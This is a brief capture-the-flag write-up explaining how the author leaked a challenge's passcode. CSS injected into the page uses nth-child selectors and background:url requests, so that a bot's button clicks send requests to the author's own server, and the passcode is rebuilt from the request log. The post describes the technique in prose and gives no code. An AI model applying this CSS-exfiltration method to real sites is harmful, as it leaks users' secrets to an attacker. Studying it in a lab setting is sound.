[https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3](https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3)

Firstly, I just tried to find a way for leaking the flag via css with h3 tag
(because the flag is stored at h3 tag) something like css attribute selector
injection.  
But, when I read the code of server side, There is a passcode which is fixed
using generate function. This function was just shuffling some letters and
it's consist of no duplicated letters.

Therefore, once, we leak the passcode, we can use it again on our clientside
for getting flag.  
So, used css' nth-child for making buttons having each attribute with
background: url to make a request for my server.  
By submitting my payload, the bot will make me a request for each passcode
when it clicks buttons.

So, we can get passcode by combining the request log

Passcode: AD14BF65EC093728

![log](https://pbs.twimg.com/media/E30idIyVcAIADt2?format=png&name=medium)

Original writeup (https://twitter.com/sqrtrev/status/1404313247281401858).